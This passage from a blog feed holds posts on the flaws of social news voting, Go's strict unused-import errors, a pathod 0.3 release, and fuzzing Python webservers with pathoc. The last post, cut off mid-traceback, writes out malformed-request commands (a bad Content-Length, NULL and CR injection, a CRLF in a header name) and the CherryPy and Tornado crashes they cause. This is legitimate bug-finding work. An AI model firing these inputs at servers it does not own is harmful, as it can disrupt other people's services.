side-effects.</p> <p>Humans are fundamentally status-seeking social apes, and you've now introduced a visible measure of social worth that people will be driven to maximize. In the real world, we have a word for those who spend their lives accumulating karma - we call them politicians. And so, within karma communities, we see the rise of a political class - persuasive centrists who cater (perhaps unconsciously) to a constituency, and who express (perhaps eloquently) opinions calculated to appeal to the masses and avoid controversy. 
Hacker News and many subreddits are dominated by people like this, whose comments are largely predictable and rarely add anything new or unexpected to the conversation.</p> <p>At the bottom end of the food chain, we have a different class of creature with the same basic aim as the politicians, but without the persuasive charm needed to pull off the political approach. These are the karma whores, who use a mixture of frank pandering, provocation and calculated outrage to achieve the same aims.</p> <p>The karma maximization game often acts contrary to the goals we aimed to achieve by introducing karma in the first place: the tenor of the community suffers, the diversity of opinion declines, and the karma whores post pictures of their cats everywhere.</p> <h2 id="the-lossy-sieve">The Lossy Sieve</h2> <p>Go and have a look at the <a rel="external" href="http://news.ycombinator.com/newest">new story submission queue</a> on Hacker News. Scroll through a few pages, and pay attention to the stories stuck at one vote - they will most likely never receive another upvote and will die in obscurity. Now, go look at the <a rel="external" href="http://news.ycombinator.com/">front page</a>. When I do this exercise I'm struck by the fact that there's plenty of crap on the front page, and quite a bit of good stuff in the submission queue languishing in obscurity. So, quality can't be the sole metric here - what determines what gets onto the front page and what doesn't?</p> <p>Let's try a thought experiment. First, set up a small number of voting accounts - say, 10 or so. Now, in the new submission queue, pick 5 random stories every hour, and give them a small number of upvotes soon after they are submitted. I predict that you will find that stories that received this small initial boost are vastly more likely to end up on the front page. 
If I'm right, then chance dominates story selection - as long as an article exceeds some basic quality threshold, it all depends on who happens to see the story soon after it is submitted, and whether the spirit moves them to vote. Note that this is not the case at the extremes - frankly bad content won't be upvoted, and really important stories will usually find their way to the top. The lossy sieve phenomenon affects everything in between.</p> <p>What this boils down to is that social news doesn't provide an effective filter - good content gets lost, and mediocre content finds its way onto our screens.</p> <h2 id="the-pinhole-effect">The Pinhole Effect</h2> <p>In social news, the front page is king. Most users never go beyond the first or second page of top stories. However, front-page real estate is incredibly limited compared to the volume of submissions on most popular subreddits and on Hacker News. The effect of this is that we're looking at a fast-flowing river of information through a pinhole. Even assuming that the selection mechanism works flawlessly, what you see on the front page is a small sliver of the total, chosen through a consensus mechanism that takes no account of individual variation in tastes and interests. The news you see is not tailored to <em>you</em> - it's tailored to some abstract, average participant, with all the rough edges of individuality smoothed away. The effect of this is that even at its best, the stories that emerge from the social news system feel like a predictable pablum dished up by the hivemind. The subreddit system tries to improve this by allowing communities to self-assemble around interests, but the pinhole effect still dominates in busy subreddits like <a rel="external" href="http://reddit.com/r/programming">/r/programming</a>.</p> <h2 id="gaming-the-system">Gaming The System</h2> <p>Social news systems are eminently gameable, and cheating is rife. 
Part of the reason for this is that a story's destiny depends on a relatively small number of votes. If your story has any merit at all, you significantly increase the likelihood that it will end up on the front page by giving it a small nudge at the beginning of its life. If it has no merit whatsoever, you can still force it onto people's screens with a few tens or hundreds of votes. Conversely, you can use the same effect to censor and oppress views you disagree with if your social news site has downvotes. Anyone who's kept an eye on these things can rattle off examples of gaming in action: the <a rel="external" href="http://en.wikipedia.org/wiki/Digg_Patriots">voting rings</a>, the <a rel="external" href="http://www.reddit.com/r/reddit.com/comments/b7e25/today_i_learned_that_one_of_reddits_most_active/">"social media consultants"</a>, the <a rel="external" href="http://www.reddit.com/r/shitredditsays">vigilante thought-polizei</a>, the <a rel="external" href="http://www.reddit.com/comments/2n2tu/ron_paul_on_the_debate_my_opponents_called_for/c2n5v8">political operators</a>, and dozens of other types of manipulation and villainy. What's more - these visible scandals are just the tip of the iceberg. Eyeballs are valuable, and there's an active arms race with social news sites on the one side, and a dark army of spammers, scammers and true believers on the other. How much of what we see is affected by this type of cheating? We just don't know, but my suspicion is that the effect is significant.</p> <p>The point here is broader than any particular instance of gaming. It's that social news sites are structurally susceptible to manipulation in ways that can't be fixed without changing the core of their operation. 
A system like this might be good enough to deliver <a rel="external" href="http://knowyourmeme.com/memes/rage-comics">rage comics</a>, but I feel queasy trusting it any further.</p> <h2 id="community-collapse-disorder">Community Collapse Disorder</h2> <p>My final beef with social news is a problem that it shares with pretty much all online communities, especially technical ones. We're all familiar with the life-cycle of technical forums. They start with a small community of insiders who create value, which then attracts more people to participate, which then dilutes the quality of the contributions (and often introduces a few pathological bad actors), which then causes the good contributors to move on, which causes the magic well to dry up. Everyone then takes their toys and moves to the next community, and the cycle repeats. We saw this with Usenet and the original C2 wiki, and we are seeing it now with Hacker News and many technical subreddits all at various points in this life-cycle.</p> <p>I believe that Community Collapse Disorder is one of the Big Problems online that we don't yet have a satisfactory solution to. People are trying, though. Hacker News, for instance, seems to be rather <a rel="external" href="https://www.google.com/search?hl=en&amp;q=site%3Anews.ycombinator.com+%22eternal+september%22">poignantly aware of its own decline</a>, with some of the <a rel="external" href="http://al3x.net/2011/02/22/solving-the-hacker-news-problem.html">best of the old-timers calling for an alternative</a>. Paul Graham himself recognizes the issue, and has been tweaking things in various ways to combat the phenomenon, without much success.</p> <p>At the moment, we just don't know how to build online communities that are both inclusive and stable. 
Democracy, here, seems to lead inevitably to decline, and social news sites are no exception.</p> <h2 id="a-better-way-forward">A better way forward?</h2> <p>A big part of the reason I don't use social news anymore is that my existing social networks have become so much more effective at turning up good content. The absolute best source of news for me is simply the set of links shared by the folks I follow on <a rel="external" href="http://twitter.com/cortesi">Twitter</a>. I follow people who post interesting content, and whom I trust to act as information filters for me. Most of them share my technical interests, but some are interesting because they are from my home town, or because they share some more esoteric pursuit with me. So, the news stream I see is exactly tailored to me. At the same time, there is also room for idiosyncrasy - if someone I follow shares something left-field that tickles their fancy, I'll see it. In turn, I try to be a responsible information filter for those who follow me - I find a link or two worth tweeting on most days.</p> <p>There are still things I miss - Twitter is great for sharing links, but is an awful medium for technical discussion. <a rel="external" href="https://plus.google.com/106243676845481872244">Google+</a> could be a better alternative, but just doesn't seem to have achieved liftoff for me. I would also love better tools for aggregating and harvesting links from my social network. At the moment I use <a rel="external" href="http://flipboard.com">Flipboard</a> and <a rel="external" href="http://getprismatic.com">Prismatic</a>, but I have issues with both. On the whole, though, these are quibbles. 
It seems to me that using social networks to filter news is a better way forward - if I was tackling the social news problem, I'd be building tools to support this process.</p> Go: a nice language with an annoying personality 2013-01-18T00:00:00+00:00 2013-01-18T00:00:00+00:00 https://corte.si/posts/code/go/go-rant/ <p>Last week, I had the pleasure of attending <a rel="external" href="http://dropbox.com">Dropbox</a>'s annual company <a rel="external" href="https://blog.dropbox.com/2012/03/hack-week-ii/">hack fest</a>. It was a great opportunity to get a look at how Dropbox works internally, and mingle with the smart and driven folks who make one of my favourite products. In the spirit of hack week, me and my friend <a rel="external" href="http://twitter.com/alexdong">@alexdong</a> decided to do our project in Go. We'd both wanted to explore the language, but had never quite been able to make time - a week-long code holiday seemed to be the perfect opportunity. I was hopeful that Go would turn out to hit a magical sweet spot: a light set of abstractions hugging close to the machine, while still providing the indoor plumbing and civilized conveniences of life that I had grown used to with languages like Python. Five days of furious hacking later, I can report that Go might well deliver on this promise, but has enough annoying personality quirks that I will think twice about basing any more projects on it.</p> <p>My main beef with Go has nothing to do with fundamental language design, and may seem almost inconsequential at first glance. The Go compiler treats unused module imports and declared variables as compile errors. This is great in theory and is something you might well want to enforce before code can be committed, but during the actual <em>process</em> of producing code it's nothing but an irksome, unnecessary pain in the ass. 
Let's look at a concrete example, starting with a snippet of code as follows <sup class="footnote-reference"><a href="#1">1</a></sup></p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> m, err</span><span style="color: #D73A49;"> :=</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> DoSomething</span><span>(m)</span></span></code></pre> <p>I'm a firm believer that printing stuff to screen is a programmer's best debugging tool, so say we're hacking away and want to print the value of <strong>m</strong> while running our unit tests. 
We change the code as follows, adding an import for the "fmt" module and a call to Print:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">fmt</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> m, err</span><span style="color: #D73A49;"> :=</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span> fmt.</span><span style="color: #6F42C1;">Print</span><span>(m)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> DoSomething</span><span>(m)</span></span></code></pre> <p>Now we keep hacking, and want to comment out the print statement for a moment like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: 
#032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">fmt</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> m, err</span><span style="color: #D73A49;"> :=</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #6A737D;"> //fmt.Print(m)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> DoSomething</span><span>(m)</span></span></code></pre> <p>This is a compile error. 
We have to switch contexts, move to the top of the module, also comment out the import, and then move back to the spot we're really hacking on:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span style="color: #6A737D;"> //&quot;fmt&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> m, err</span><span style="color: #D73A49;"> :=</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #6A737D;"> //fmt.Print(m)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6F42C1;"> DoSomething</span><span>(m)</span></span></code></pre> <p>A few seconds later, we want to re-enable the Print statement - so up we go again to the top of the module to re-enable the import. 
This is even worse when we want to, say, comment out the <strong>DoSomething</strong> call while hacking:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> m, err</span><span style="color: #D73A49;"> :=</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6A737D;"> //DoSomething(m)</span></span></code></pre> <p>This is also a compile error because now <em>m</em> is unused. We have to hunt up in our code to find the declaration, which could be explicit or implicit using an <strong>:=</strong> assignment. 
So, in this case we find the declaration, and use the magic underscore name to throw the offending value away:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> _, err</span><span style="color: #D73A49;"> :=</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6A737D;"> //DoSomething(m)</span></span></code></pre> <p>That should fix it, right? Well, no. It turns out we've previously declared and used <strong>err</strong> (a very common idiom), so this is still a compile error. We're using the "declare and assign" syntax, but have no new variables on the left-hand side of the ":=". 
So we need to make another tweak:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="go"><span class="giallo-l"><span style="color: #D73A49;">import</span><span> (</span></span> <span class="giallo-l"><span style="color: #032F62;"> &quot;</span><span style="color: #6F42C1;">io/ioutil</span><span style="color: #032F62;">&quot;</span></span> <span class="giallo-l"><span>)</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span> _, err</span><span style="color: #D73A49;"> =</span><span> ioutil.</span><span style="color: #6F42C1;">ReadFile</span><span>(path)</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> err</span><span style="color: #D73A49;"> !=</span><span style="color: #005CC5;"> nil</span><span> {</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span style="color: #005CC5;"> nil</span><span>, err</span></span> <span class="giallo-l"><span> }</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #D73A49;">...</span></span> <span class="giallo-l"><span style="color: #6A737D;"> //DoSomething(m)</span></span></code></pre> <p>Five seconds later, we want to re-enable <strong>DoSomething</strong>, and now we have to unwind the entire process.</p> <p>The cumulative effect of all this is like trying to write code while someone next to you randomly knocks your hands off the keyboard every few seconds. It's a pointlessly pedantic approach that adds constant friction to your write-compile-test cycle, breaks your flow, and just generally makes life a little harder for very little benefit. 
There's no way to turn this mis-feature off, no flag we can pass to the compiler to temporarily make this a warning rather than an error while hacking<sup class="footnote-reference"><a href="#2">2</a></sup>.</p> <p>The irony of the situation is that I agree with the sentiment behind this. I don't want dangling variables or imports in my codebase. And I agree that if something is worth warning about it's worth making it an error. The mistake is to confuse the state we want at the conclusion of a unit of hacking<sup class="footnote-reference"><a href="#3">3</a></sup>, with what we need at every point in between, during the write-compile-test cycle. This cycle is the core of the process of actually producing code, and the <a rel="external" href="http://xkcd.com/353/">exhilarating sense of weightlessness</a> that you get when hacking in Python is largely due to the fact that the language works really, really hard to optimize this process. Go has given away this feeling of exhilaration, basically for nothing.</p> <p>Despite all this, it's still possible that the benefits of Go do outweigh its irritating personality. Interfaces, memory management, first-class concurrency and static type checking are a knockout combination, and the language in general has something of the taut practicality that I love in C. So, despite the rantiness of this post, I'll keep hacking on our project and make sure I produce a few thousand more lines of code before making a final call on the language. Look for a project release and a blog post along these lines in the coming months.</p> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>Ellipses indicate "an arbitrary amount of intervening code"</p> </div> <div class="footnote-definition" id="2"><sup class="footnote-definition-label">2</sup> <p>I edited this paragraph a bit for tone. 
I originally accused the Go documentation of being faintly smug about all of this - which is not fair, and doesn't add anything to the argument.</p> </div> <div class="footnote-definition" id="3"><sup class="footnote-definition-label">3</sup> <p>Why don't we have a word for this? By "unit of hacking", I mean the work that goes on between starting to hack on a change-set and doing a commit. At the beginning and at the end, the code is in a clean state, but in between there are many periods of transition where cleanliness requirements are relaxed.</p> </div> Released: pathod 0.3 2012-11-16T00:00:00+00:00 2012-11-16T00:00:00+00:00 https://corte.si/posts/code/pathod/announce0_3/ <p>I've just released <a rel="external" href="http://pathod.net">pathod 0.3</a>, which beefs up <a rel="external" href="http://pathod.net/docs/pathoc">pathoc</a>'s fuzzing capabilities, improves the spec language and includes lots of bugfixes and other small tweaks. Get it while it's hot!</p> <h2 id="better-fuzzing">Better fuzzing</h2> <p>A major focus of this release is to improve <a rel="external" href="http://pathod.net/docs/pathoc">pathoc</a>'s capabilities as a basic fuzzing tool. I've had fun <a href="https://corte.si/posts/code/pathod/pythonservers/">breaking webservers</a> with pathoc, and it's even come in handy in my Day Job. Here's a quick summary of how things have changed.</p> <ul> <li>The <strong>-x</strong> flag tells pathoc to explain its requests. This prints out an expanded pathoc query specification, with all randomly generated content and query modifications resolved. If you trigger an exception, you can precisely replay the offending query using this explanation.</li> <li>The options for outputting requests and responses have been expanded hugely. First, the <strong>-q</strong> and <strong>-r</strong> flags tell pathoc to dump complete records of requests and responses respectively. 
This data is sniffed by instrumenting the socket, so is canonical regardless of our ability to interpret returned data. The <strong>-x</strong> option makes pathoc dump this data in hexdump format (otherwise unprintable characters are escaped to preserve your terminal).</li> <li>A number of options have been added to let you ignore expected responses. <strong>-C</strong> takes a comma-separated list of response codes to ignore. <strong>-T</strong> ignores server timeouts. This lets you home in on the exceptional responses that you care about, and ignore the rest.</li> </ul> <h2 id="language-improvements">Language improvements</h2> <ul> <li>I've simplified response specifications by making the response message a standard component with the "r" mnemonic.</li> <li>I've added the "u" mnemonic to request specifications, as a shortcut for specifying the User-Agent header:</li> </ul> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>get:/:u&quot;My Weird User-Agent&quot;</span></span></code></pre> <p>We also have a small library of representative User-Agent strings that can be used instead of specifying your own. 
For example, this specifies the GoogleBot User-Agent string:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>get:/:ug</span></span></code></pre> <p>The list of available shortcuts is in the docs, and can be listed from the commandline using the <strong>--show-uas</strong> flag to pathoc:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>&gt; ./pathoc --show-uas</span></span> <span class="giallo-l"><span>User agent strings:</span></span> <span class="giallo-l"><span> a android</span></span> <span class="giallo-l"><span> l blackberry</span></span> <span class="giallo-l"><span> b bingbot</span></span> <span class="giallo-l"><span> c chrome</span></span> <span class="giallo-l"><span> f firefox</span></span> <span class="giallo-l"><span> g googlebot</span></span> <span class="giallo-l"><span> i ie9</span></span> <span class="giallo-l"><span> p ipad</span></span> <span class="giallo-l"><span> h iphone</span></span> <span class="giallo-l"><span> s safari</span></span></code></pre> pathoc: break all the Python webservers! 2012-09-27T00:00:00+00:00 2012-09-27T00:00:00+00:00 https://corte.si/posts/code/pathod/pythonservers/ <p>A few months ago, I announced <a rel="external" href="http://pathod.net">pathod</a>, a pathological HTTP daemon. The project started as a testing tool to let me craft standards-violating HTTP responses while working on <a rel="external" href="http://mitmproxy.org">mitmproxy</a>. It soon became a free-standing project, and has turned out to be incredibly useful in security testing, exploit delivery and general creative mischief. In the last release, I added pathoc - pathod's malicious client-side twin. 
It does for HTTP requests what pathod does for HTTP responses, and uses the same <a rel="external" href="http://pathod.net/docs/language">hyper-terse specification language</a>.</p> <p>In this post, I show how pathoc can be used as a very simple fuzzer, by finding issues in a number of major pure-Python webservers. None of the tested servers failed catastrophically - they all caught the unexpected exception and continued serving requests. Nonetheless, I think it's reasonable to say that we've triggered a bug if a) the server returns a 500 Internal Server Error response or terminates the connection abnormally, and b) we see a traceback in our logs. In fact, by this definition, I found bugs in <em>every</em> pure-Python server I tested.</p> <p>All of the problems I list below are simple failures of validation - what they have in common is that somewhere in the project, code is called with input that it doesn't expect and can't handle. This matters - in fact, I'd argue that the majority of security problems fall in this category. It's interesting to ponder why this type of issue is so ubiquitous in Python servers. I have no doubt that part of the answer lies in Python's use of exceptions - errors that would be explicit in other languages can be implicit in Python, and code that seems clean and intuitive might in fact be buggy. I think this is especially relevant right now, given the recent flurry of discussion surrounding the <a rel="external" href="http://golang.org/">Go language</a> and its error handling. It's pretty instructive to read Russ Cox's <a rel="external" href="https://plus.google.com/116810148281701144465/posts/iqAiKAwP6Ce">recent riposte</a> to <a rel="external" href="http://uberpython.wordpress.com/2012/09/23/why-im-not-leaving-python-for-go/">this post</a> criticizing Go's explicit approach, while looking at the bugs below. 
<a rel="external" href="https://github.com/cortesi">I love Python</a> and I think it's a fine language, but I also think the designers of Go probably made the right choice.</p> <h2 id="basic-fuzzing-with-pathoc">Basic fuzzing with pathoc</h2> <p>My methodology for these tests was very simple indeed. I launched each server in turn, and used pathoc to fire corrupted GET requests at the daemon until I saw an error. I then looked at the logs, and boiled the distinct cases down to a minimal pathoc specification by hand. This exercises a rather shallow set of features in the server software - mostly parsing of the HTTP lead-in and request headers. It's possible to give software a much, much deeper workout with pathoc, but I'll leave that for a future post.</p> <p>My pathoc fuzzing command looked something like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -n 1000 -p 8080 -t 1</span><span style="color: #032F62;"> localhost &#39;get:/:b@10:ir,&quot;\x00&quot;&#39;</span></span></code></pre> <p>The most important flags here are <b>-n</b>, which tells pathoc to make 1000 consecutive requests, and <b>-t</b>, which tells pathoc to time out after one second (necessary to prevent hangs when daemons terminate improperly). The request specification itself breaks down as follows:</p> <table class="table"> <tr> <td>get</td> <td>Issue a GET request</td> </tr> <tr> <td>/</td> <td>... to the path / </td> </tr> <tr> <td>b@10</td> <td>... with a body consisting of 10 random bytes </td> </tr> <tr> <td>ir,"\x00"</td> <td>... and inject a NULL byte at a random location.</td> </tr> </table> <p>It's that last clause - the random injection - that makes the difference between simply crafting requests and basic fuzzing. Every time a new request is issued, the injection occurs at a different location. 
I varied the injected character between a NULL byte, a carriage return and a random alphabet letter. Each exposed different errors in different servers. For a complete description of the specification language, see the <a rel="external" href="http://pathod.net/docs/language">online docs</a>.</p> <h2 id="results">Results</h2> <p>For each bug, I've given a traceback and a minimal pathoc call to trigger the issue. The tracebacks have been edited lightly to shorten file paths and remove irrelevances like timestamps.</p> <h3 id="cherrypy">CherryPy</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:b@10:h&quot;Content-Length&quot;=&quot;x&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>ENGINE ValueError(&quot;invalid literal for int() with base 10: &#39;x&#39;&quot;,)</span></span> <span class="giallo-l"><span>Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;cherrypy/wsgiserver/wsgiserver2.py&quot;, line 1292, in communicate</span></span> <span class="giallo-l"><span> req.parse_request()</span></span> <span class="giallo-l"><span> File &quot;cherrypy/wsgiserver/wsgiserver2.py&quot;, line 591, in parse_request</span></span> <span class="giallo-l"><span> success = self.read_request_headers()</span></span> <span class="giallo-l"><span> File &quot;cherrypy/wsgiserver/wsgiserver2.py&quot;, line 711, in read_request_headers</span></span> <span class="giallo-l"><span> if mrbs and int(self.inheaders.get(&quot;Content-Length&quot;, 0)) &gt; mrbs:</span></span> <span class="giallo-l"><span>ValueError: invalid literal for int() with base 10: &#39;x&#39;</span></span></code></pre><pre class="giallo" style="color: 
#24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:i4,&quot;\r&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>ENGINE TypeError(&quot;argument of type &#39;NoneType&#39; is not iterable&quot;,)</span></span> <span class="giallo-l"><span>Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;cherrypy/wsgiserver/wsgiserver2.py&quot;, line 1292, in communicate</span></span> <span class="giallo-l"><span> req.parse_request()</span></span> <span class="giallo-l"><span> File &quot;cherrypy/wsgiserver/wsgiserver2.py&quot;, line 580, in parse_request</span></span> <span class="giallo-l"><span> success = self.read_request_line()</span></span> <span class="giallo-l"><span> File &quot;cherrypy/wsgiserver/wsgiserver2.py&quot;, line 644, in read_request_line</span></span> <span class="giallo-l"><span> if NUMBER_SIGN in path:</span></span> <span class="giallo-l"><span>TypeError: argument of type &#39;NoneType&#39; is not iterable</span></span></code></pre><h3 id="tornado">Tornado</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:b@10:h&quot;Content-Length&quot;=&quot;x&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>[E 120927 11:42:26 iostream:307] Uncaught exception, closing connection.</span></span> <span class="giallo-l"><span> Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File 
&quot;tornado/iostream.py&quot;, line 304, in wrapper</span></span> <span class="giallo-l"><span> callback(*args)</span></span> <span class="giallo-l"><span> File &quot;tornado/httpserver.py&quot;, line 254, in _on_headers</span></span> <span class="giallo-l"><span> content_length = int(content_length)</span></span> <span class="giallo-l"><span> ValueError: invalid literal for int() with base 10: &#39;x&#39;</span></span> <span class="giallo-l"><span>[E 120927 11:42:26 ioloop:435] Exception in callback &lt;tornado.stack_context._StackContextWrapper object at 0x1012e28e8&gt;</span></span> <span class="giallo-l"><span> Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;tornado/ioloop.py&quot;, line 421, in _run_callback</span></span> <span class="giallo-l"><span> callback()</span></span> <span class="giallo-l"><span> File &quot;tornado/iostream.py&quot;, line 304, in wrapper</span></span> <span class="giallo-l"><span> callback(*args)</span></span> <span class="giallo-l"><span> File &quot;tornado/httpserver.py&quot;, line 254, in _on_headers</span></span> <span class="giallo-l"><span> content_length = int(content_length)</span></span> <span class="giallo-l"><span> ValueError: invalid literal for int() with base 10: &#39;x&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:h&quot;h\r\n&quot;=&quot;x&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>[E iostream:307] Uncaught exception, closing connection.</span></span> <span class="giallo-l"><span> Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File 